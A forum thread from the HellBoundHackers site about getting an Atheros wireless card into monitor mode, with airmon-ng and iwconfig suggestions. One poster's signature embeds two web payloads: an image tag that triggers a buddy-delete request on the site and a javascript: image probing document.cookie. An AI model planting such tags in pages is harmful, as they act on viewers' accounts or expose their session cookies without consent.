Follow us on Twitter!
The important thing is not to stop questioning. - Albert Einstein
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 34
Guests Online: 34
Members Online: 0

Registered Members: 82831
Newest Member: FL4SHC0D3R
Latest Articles
View Thread

HellBound Hackers | Computer General | Networking

Author

Cant switch to monitor mode


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-05-08 02:28
whan i try to switch my wireless card to monitor mode with
Code

sudo iwconfig ath0 mode monitor





i get :
Code

SET failed on device ath0; invalid argument





but i can use:
[code]
sudo ifconfig ath0 mode managed
[code]
why cant i switch to monitor mode?


Author

RE: Google is the sensei to a hacker student :


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-05-08 03:19
I googled your problem : switch+wireless+card+to+monitor+mode

I found this in the first link :

#airmon.sh start wlan0

If that doesnt help , keep searching similar links .

Sorry if this wasnt usefull but im not very knowledgeable on wireless cards .

Tog go bog e , Neqtan


Author

RE: Cant switch to monitor mode


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-05-08 04:42
Neqtan wrote:
I googled your problem : switch+wireless+card+to+monitor+mode
I found this in the first link :
#airmon.sh start wlan0
If that doesnt help , keep searching similar links .
Sorry if this wasnt usefull but im not very knowledgeable on wireless cards .
Tog go bog e , Neqtan


almost worked, you had the right idea i looked alot harder and found that you run

Code

airmon-ng stop interface
airmon-ng start interface





jus for other people as nooby as mee


Author

RE: Cant switch to monitor mode


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 20-05-08 08:34
I have an atheros card in my eee, but to get it to run, Ihave ti use

airmon-ng start wifi0

This creates a new interface, ath1, which is in monitor mode.



Author

RE: Cant switch to monitor mode

Infam0us
Member



Posts: 153
Location: 0x080484c6
Joined: 06.09.07
Rank:
Apprentice
Posted on 20-05-08 15:02
jjbutler88 wrote:
I have an atheros card in my eee, but to get it to run, Ihave ti use

airmon-ng start wifi0

This creates a new interface, ath1, which is in monitor mode.




This will work just make sure you have a wireless card with an athero's chipset. Otherwise the 'madwifi' driver will not work and you will have the problem your having. I have this wireless http://www.netgea. . .PN511.aspx
and it works like a charm for everything i need it to do. You can buy it at most radio shacks for pretty damn cheap.


"Never memorize what you can look up in books." -Albert Einstein
www.rohitab.com/discuss/style_emoticons/default/suicide_anim.gif
[img]http://www.hellboundhackers.org/fusion_infusions/buddy_panel/buddy_delete.php?id=2783[/img]


[img]javasc ript:alert(document.cookie);[/img]